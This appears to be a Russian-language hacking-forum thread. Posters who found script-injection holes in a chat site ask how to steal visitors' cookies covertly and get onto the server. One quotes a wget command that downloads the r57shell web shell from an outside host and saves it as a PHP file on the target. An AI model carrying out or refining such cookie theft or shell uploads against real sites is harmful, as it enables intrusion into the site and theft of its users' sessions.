Привет всем нашол дыру в чате мона вставлять java script самое интересное я всегда почти дыры нахожу ))) Но вот юзать их я не умею что подскажите ? Сервер Апач 2.11 помойму система Win nt И вообще что можно вставить с помошью жава скрипт ??? кроме чтение cookies ...????
пофигу какой версии апач стоит, пофигу какая ОС... с помощью джава скрипта ты как нистранно, можешь много что сделать, на что соображалки хватит, то и делай. А вот кукисы ты благодаря снифферу "читаешь".. java script лишь проводник
У меня такая же проблема!!!! ПОМОГИТЕ!!! Короче я нашел vb-including. Т.е. я выполняю на системе vbscript:alert(); и он РАБОТАЕТ! Но когда я пытаюсь залить шелл vbscript:wget http://rst.void.ru/download/r57shell.txt -0 etoneshell.php он наверное ошибается и синтакс меняется! Как быть???
Привет вот собственно и я ))) Пасибо за ссылки )) конешшно )) но у меня вопрос такой
Можно как то пробраться на сервер с помощью жава скрипт ??? потому что только жава скрипт и html распазнаёт ( так вот только кукисы мона тырить получаеться ???
Ну раз никак с помощью java script нильзя то скажите как мона тырить cookie без использование ALERT ??? тоесть типа мышкой по картинке куки в лог ?